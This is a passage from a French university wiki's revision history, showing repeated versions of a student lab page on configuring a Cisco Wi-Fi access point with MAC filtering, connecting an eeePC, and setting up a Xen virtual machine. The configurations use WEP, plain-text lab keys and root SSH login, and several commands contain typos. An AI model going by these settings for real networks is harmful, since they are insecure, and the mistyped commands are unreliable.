<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
on se connecte a notre MV<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22542
TP sysres IMA2a5 2015/2016 G3
2015-10-28T10:34:30Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22541
TP sysres IMA2a5 2015/2016 G3
2015-10-28T10:32:32Z
<p>Mstrunc : </p>
<hr />
<div><br />
<h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22536
TP sysres IMA2a5 2015/2016 G3
2015-10-28T10:18:09Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
<br />
<br />
<br />
<br />
iwconfig wlan0 essid T2<br />
<br />
<br />
on est bien connecté :<br />
<br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22535
TP sysres IMA2a5 2015/2016 G3
2015-10-28T10:07:06Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
<br />
// on se connecte a notre MV<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage <br />
apt-get purge systemd<br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre></div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=22534
TP sysres IMA2a5 2015/2016 G3
2015-10-28T10:05:21Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
